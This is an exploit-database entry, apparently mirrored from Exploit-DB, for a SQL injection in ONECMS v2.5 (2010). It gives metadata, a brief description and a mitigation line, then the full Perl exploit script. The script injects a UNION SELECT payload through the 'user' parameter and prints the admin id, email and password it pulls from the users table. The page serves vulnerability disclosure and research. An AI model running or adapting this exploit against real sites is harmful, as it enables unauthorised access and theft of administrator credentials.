header-logo
Suggest Exploit
vendor:
ONECMS
by:
Ctacok and .:[melkiy]:.
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ONECMS
Affected Version From: 2.5
Affected Version To: 2.5
Patch Exists: NO
Related CWE: N/A
CPE: a:onecms:onecms:2.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 9.10 Apache2+PHP5
2010

ONECMS v2.5 SQL INJECTION

ONECMS v2.5 is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to the admin panel of the application. The exploit requires the Magic_quotes to be set to Off. The exploit code is written in Perl and it takes the host and path as arguments. It then sends a malicious request to the application which results in the disclosure of the admin credentials.

Mitigation:

Ensure that the Magic_quotes is set to On and input validation is done properly.
Source

Exploit-DB raw data:

# Exploit Title: ONECMS v2.5 SQL INJECTION 
# Date: 05.03.2010
# Author: Ctacok and .:[melkiy]:.
# Software Link: http://sourceforge.net/projects/onecms/
# Version: 2.5
# Tested on: Ubuntu 9.10 Apache2+PHP5

#!/usr/bin/perl 
use LWP::Simple;
print "\n";
print "##############################################################\n";
print "# ONECMS v2.5 SQL INJECTION                                  #\n";
print "# Bug founded by: .:[melkiy]:.                               #\n";
print "# Exploit coded by: Ctacok                                   #\n";
print "# Special for Antichat (forum.antichat.ru)                   #\n";
print "# Require : Magic_quotes = Off                               #\n";
print "##############################################################\n";
if (@ARGV < 2)
{
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ prefix \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$prefix=$ARGV[2];   #  PREFIX TABLES, Default: onecms
$vuln = "-2'+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a),10,11+from+".$prefix."_users";
$doc = get($host.$path."index.php?load=elite&user=".$vuln."+--+");
if ($doc =~ /:::(.+):(.+):(.+):::/){
        	print "\n[+] Admin id: : $1";
		print "\n[+] Admin email: $2";
		print "\n[+] Admin password: $3";
}

Navigation

Suggest Exploit

Services By CQR